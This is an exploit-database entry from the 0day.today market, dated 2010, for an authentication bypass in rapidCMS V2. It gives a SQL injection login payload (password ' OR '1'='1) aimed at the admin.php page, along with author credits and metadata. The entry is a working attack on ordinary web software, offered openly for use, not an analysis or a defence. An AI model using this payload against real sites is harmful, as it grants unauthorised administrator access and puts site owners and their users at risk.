[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

rapidCMS V2 Authentication Bypass

Author
Mahjong
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13399
Category
web applications
Date add
18-07-2010
Platform
php
=================================
rapidCMS V2 Authentication Bypass
=================================


# Exploit Title: rapidCMS V2 Authentication Bypass
# Date: [18/07/2010]
# Author: Mahjong
# Software Link: www.rapidcms.de
# Version: V2
# Tested on: Linux
  
* Found by: Mahjong
* E-Mail: mahjong@phcn.ws
* Greetings: Puddy, Ancolon
 
----------------------------------------------------------   
 
Exploit Authentication Bypass:
  
User: something
Pass: ' OR '1'='1
   
----------------------------------------------------------
    
Demo :
http://site.tld/admin.php
   
----------------------------------------------------------



#  0day.today [2024-11-16]  #